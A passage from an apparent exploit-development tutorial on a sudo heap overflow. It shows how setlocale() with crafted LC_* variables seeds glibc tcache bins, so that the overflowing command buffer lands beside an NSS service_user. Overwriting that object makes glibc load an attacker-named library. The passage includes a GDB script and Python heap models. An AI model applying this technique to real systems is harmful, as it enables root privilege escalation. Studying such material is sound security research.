#define __LC_TELEPHONE      10   // newnames[10]
#define __LC_MEASUREMENT    11   // newnames[11]
#define __LC_IDENTIFICATION 12   // newnames[12]

One subtlety: the processing loop in setlocale(LC_ALL, …) iterates categories backwards (while category--), so allocations happen from high→low even though the table is indexed low→high.

Then comes the ownership flip:

C
newnames[category] = __strdup(newnames[category]);

Here, __strdup (glibc's internal strdup) mallocs a fresh buffer, copies the locale string (NUL-terminated), and returns the heap pointer:

fuzz_sudo_1-69

The loop repeats for every remaining category, from the highest index to the lowest:

fuzz_sudo_1-70

In our trace, this left 13 chunks: one reused 0x20 chunk (taken from tcache by the first category) plus 12 fresh allocations carved from the top chunk:

fuzz_sudo_1-71

Since composite is successfully built, the cleanup path isn't triggered. All the duplicated locale name chunks remain live, anchored by newnames[]:

fuzz_sudo_1-72

So far: we've confirmed that each category leads to a controlled malloc, and that freeing only happens if we deliberately induce a failure. Next up, we'll rig the env vars so the cleanup path kicks in and dumps those allocations back into tcache — exactly the primitive we want.

9.3.2. ENV Manipulation

With the groundwork in place, we can now feed setlocale() tailored LC_* values to force allocations of chosen sizes, then deliberately trip a failure to dump them all back into tcache.

A minimal GDB script lets us automate this:

set pagination off
set confirm off

python
import gdb

# Build a locale name of length 8 + n; strdup adds one more byte for the NUL.
def mk(n):
    return 'C.UTF-8@' + 'A' * n

# (variable, padding) listed in processing order: setlocale walks the
# categories from the highest index down, so LC_IDENTIFICATION goes first.
envs = [
    ('LC_IDENTIFICATION', 15),   # 0x20 chunk, processed first
    ('LC_MEASUREMENT',    31),   # 0x30 chunk
    ('LC_TELEPHONE',      47),   # 0x40 chunk
    ('LC_ADDRESS',        63),   # 0x50 chunk
    ('LC_NAME',           79),   # 0x60 chunk
    ('LC_PAPER',          95),   # 0x70 chunk
    ('LC_MESSAGES',      111),   # 0x80 chunk
    ('LC_MONETARY',      127),   # 0x90 chunk
    ('LC_COLLATE',       143),   # 0xa0 chunk, same bin as the next two
    ('LC_TIME',          143),   # 0xa0 chunk
    ('LC_NUMERIC',       143),   # 0xa0 chunk
]

# Names that load successfully: each one is strdup'd into the chunk noted above.
for env, n in envs:
    gdb.execute(f"set environment {env}={mk(n)}", to_string=True)

# Invalid name: LC_CTYPE is processed last, fails, and triggers the cleanup frees.
gdb.execute("set environment LC_CTYPE=bad/locale", to_string=True)
end

The n values are chosen from the earlier bin-size table, ensuring each category's duplicated locale name lands in a predictable heap bin.
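The padding values can also be derived rather than looked up. The sketch below assumes 64-bit glibc (8-byte size field, 16-byte alignment, 0x20 minimum chunk) and the same `C.UTF-8@` prefix as `mk()`; `chunk_size` and `pad_for_chunk` are hypothetical helper names, not glibc functions.

```python
PREFIX = "C.UTF-8@"   # same prefix as mk() in the GDB script
SIZE_SZ = 8           # assumption: 64-bit glibc
ALIGN = 16
MIN_CHUNK = 0x20


def chunk_size(request):
    """Chunk size malloc picks for a request of `request` bytes."""
    size = (request + SIZE_SZ + ALIGN - 1) & ~(ALIGN - 1)
    return max(size, MIN_CHUNK)


def pad_for_chunk(target):
    """Largest 'A' count whose duplicated locale name still fits `target`."""
    usable = target - SIZE_SZ            # bytes available to the string
    return usable - 1 - len(PREFIX)      # minus the NUL, minus the prefix


for target in range(0x20, 0xb0, 0x10):
    n = pad_for_chunk(target)
    name = PREFIX + "A" * n
    # Cross-check: strdup requests strlen + 1 bytes.
    assert chunk_size(len(name) + 1) == target
    print(f"chunk {target:#x}: n = {n}")
```

Each n is the largest padding that still fits its size class; one more 'A' pushes the duplicate into the next bin.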

Run with:

gdb -q -x loc_env.gdb --args ./loc

Once execution reaches the __strdup calls, the heap layout aligns exactly with our crafted env strings:

fuzz_sudo_1-74

And when the invalid LC_CTYPE=bad/locale is processed last, _nl_find_locale fails, pushing setlocale down the cleanup path — every previously allocated chunk is freed back-to-back into tcache:

fuzz_sudo_1-75

Notice in the dump:

  • Three 0xa0-sized chunks now sit in the bin list because we seeded three categories with identical size values.
  • Earlier frees (e.g., 0x30) also appear in the right bins.
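The resulting bin state can be modeled in a few lines of Python. This is a toy, not the allocator: it assumes tcache bins behave as per-size LIFO lists with the default capacity of 7, and it assumes the cleanup path frees the names in ascending category order. `free_all` and `malloc` are hypothetical helpers, and chunks are identified by their owning category instead of an address.

```python
from collections import defaultdict

TCACHE_COUNT = 7  # default per-bin capacity in glibc's tcache

# (category, chunk size) as seeded by the GDB script, listed in the
# assumed free order (ascending category index).
SEEDED = [
    ("LC_NUMERIC", 0xa0), ("LC_TIME", 0xa0), ("LC_COLLATE", 0xa0),
    ("LC_MONETARY", 0x90), ("LC_MESSAGES", 0x80), ("LC_PAPER", 0x70),
    ("LC_NAME", 0x60), ("LC_ADDRESS", 0x50), ("LC_TELEPHONE", 0x40),
    ("LC_MEASUREMENT", 0x30), ("LC_IDENTIFICATION", 0x20),
]


def free_all(chunks):
    """Push every chunk onto the head of the bin for its size."""
    bins = defaultdict(list)
    for owner, size in chunks:
        if len(bins[size]) < TCACHE_COUNT:
            bins[size].insert(0, owner)
    return bins


def malloc(bins, size):
    """Pop the head of the matching bin, or None if the bin is empty."""
    return bins[size].pop(0) if bins[size] else None


bins = free_all(SEEDED)
for size in sorted(bins):
    print(f"{size:#x}: {' -> '.join(bins[size])}")
```

Under these assumptions the 0xa0 bin holds three entries and the most recently freed one is handed out first, which is the property the later steps rely on.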

This gives us a predictable allocator/free primitive at process startup. By pre-loading tcache bins with chosen sizes, we can deterministically shape the heap such that our vuln chunk lands immediately above the NSS target chunks.

9.4. Heap Fengshui on Sudo

I initially thought of pushing this into the next chapter since it's part of the exploit proper. But in practice, every heap exploitation chain begins with shaping the arena — so it makes sense to close this chapter by tying our fengshui primitive to the real target.

9.4.1. Target Heap Object

Given the #Requirements we collected:

  • #Requirement 1: lib_handle == NULL on service_library
    • Ensures the dlopen path is taken: (*currentp)->lib_handle = NULL;
  • #Requirement 2: ni->library == NULL on service_user
    • Forces creation/attach of a fresh service_library (#Requirement 1).
  • #Requirement 3: ni->name hijacked to a nonexistent service
    • Steers lookup to libnss_<name>.so.2 under our control.
  • #Requirement 4: symbol cache miss (ni->known lacks fct_name)
    • Forces a fresh dlsym (e.g., for "getpwuid_r").

The net effect: we just need to smash a service_user chunk. Overwriting its .name and resetting .library to NULL is enough to force glibc into dlopening our library on the next lookup.

So, the victim is one of the initialized service_user objects parsed from /etc/nsswitch.conf.

9.4.2. Target Sizes

Quick recap of object sizes:

Object               | Typical request size                | Typical chunk (mchunk)
name_database        | 0x10                                | 0x20
name_database_entry  | 0x10 + (db_len+1) → usually 0x20    | 0x20
service_library      | 0x18                                | 0x20
service_user         | 0x30 + (svc_len+1) → usually 0x40   | 0x40

So, our fengshui must guarantee that 0x40 tcache bins are primed — because that's what service_user lives in.
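As a quick sanity check on the recap, the formulas can be evaluated for a few common names. This is a sketch assuming 64-bit glibc chunk rounding and the fixed-part sizes from the recap (0x30 for service_user, 0x10 for name_database_entry); the helper names and the sample service and database names are illustrative only.

```python
def chunk_size(request, size_sz=8, align=16, min_chunk=0x20):
    """Chunk size for a malloc request, assuming 64-bit glibc rounding."""
    size = (request + size_sz + align - 1) & ~(align - 1)
    return max(size, min_chunk)


# Fixed-size parts, taken from the recap of object sizes.
SERVICE_USER_FIXED = 0x30
DATABASE_ENTRY_FIXED = 0x10


def service_user_chunk(service):
    """Chunk holding a service_user whose name is `service`."""
    return chunk_size(SERVICE_USER_FIXED + len(service) + 1)


def database_entry_chunk(database):
    """Chunk holding a name_database_entry named `database`."""
    return chunk_size(DATABASE_ENTRY_FIXED + len(database) + 1)


for svc in ("files", "compat", "systemd", "mymachines"):
    print(f"service_user({svc!r}) -> {service_user_chunk(svc):#x}")
for db in ("passwd", "group", "netgroup"):
    print(f"name_database_entry({db!r}) -> {database_entry_chunk(db):#x}")
```

The "usually" matters: under this rounding, a service name longer than seven characters moves its service_user into the 0x50 class, so the sizes should be checked against the nsswitch.conf on the actual target.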

9.4.3. Vuln Chunk Size

We need a driver chunk that will later overflow into a victim. Two rules:

  1. It must be easy to mint with our setlocale alloc/free primitive.
  2. It should belong to a rarely used size class, so it survives uncontested until we trigger the vuln.

We can develop a helper GDB script to parse and summarize our allocation traces (heap_trace.log). Example output:

fuzz_sudo_1-76

By analyzing the output, we see that 0xa0 and 0xb0 chunks are barely touched across execution. Both fall within tcache range (chunk sizes up to 0x410 on 64-bit glibc), and tcache bins are LIFO, which makes them easy to control during heap fengshui.

Thus, we select 0xa0 as our vuln chunk size.

9.4.4. Fengshui Design

Heap shaping is where “fengshui” earns its name: the art is in placing the vulnerable driver chunk just above the target NSS chunks, while minimizing collateral corruption.

In §8.3.2, we saw the baseline layout (without fengshui):

fengshui_1

Here, most NSS chunks (entries, service_users) are carved from the unsorted bin after parsing /etc/nsswitch.conf, with occasional allocations satisfied from earlier tcache frees.

With our setlocale primitive, we can deterministically reseed the bins:

fengshui_2

Plan:

  1. Seed the tcache with one 0xa0 chunk and several 0x40 chunks, all freed via setlocale.
  2. When __nss_database_lookup builds the service_user chain, those cached chunks are consumed first → placing our target service_user nodes exactly where we want them.
  3. Other structures (0x20-sized) can still flow naturally from top/unsorted bins, so we don't disrupt global root tables.
  4. Later, set_cmnd() allocates the vulnerable command-path chunk (0xa0). Because it sits just above the reused 0x40 victim (that is, at a lower address), the overflow runs downward in the dump into the target service_user (e.g., one belonging to the "group" database).
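The plan can be rehearsed on a toy heap. The model below is deliberately crude: a bump allocator standing in for the top chunk plus per-size LIFO free lists standing in for tcache. The base address, the number of 0x40 chunks, and the back-to-back allocation order are all assumptions chosen for illustration; the real process has other allocations competing for the same bins.

```python
class ToyHeap:
    """Bump allocator plus per-size LIFO free lists (tcache-like)."""

    def __init__(self, base=0x1000):  # hypothetical base address
        self.top = base
        self.bins = {}

    def malloc(self, size):
        cached = self.bins.get(size)
        if cached:
            return cached.pop()        # reuse the most recently freed chunk
        addr = self.top
        self.top += size               # otherwise carve from the top
        return addr

    def free(self, addr, size):
        self.bins.setdefault(size, []).append(addr)


heap = ToyHeap()

# Step 1: setlocale duplicates one 0xa0 name, then two 0x40 names,
# back to back, and the cleanup path frees them all.
driver = heap.malloc(0xa0)
victims = [heap.malloc(0x40) for _ in range(2)]
heap.free(driver, 0xa0)
for addr in victims:
    heap.free(addr, 0x40)

# Step 2: NSS parsing takes the cached 0x40 chunks for service_user nodes.
service_users = [heap.malloc(0x40) for _ in range(2)]

# Step 4: set_cmnd() takes the cached 0xa0 chunk for the command buffer.
cmnd = heap.malloc(0xa0)

adjacent = cmnd + 0xa0
print(f"cmnd chunk at {cmnd:#x}, next chunk at {adjacent:#x}")
print("overflow reaches a service_user:", adjacent in service_users)
```

In this toy layout the command buffer ends exactly where one of the recycled 0x40 chunks begins, so a linear overflow out of it lands in a service_user.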

That's the fengshui.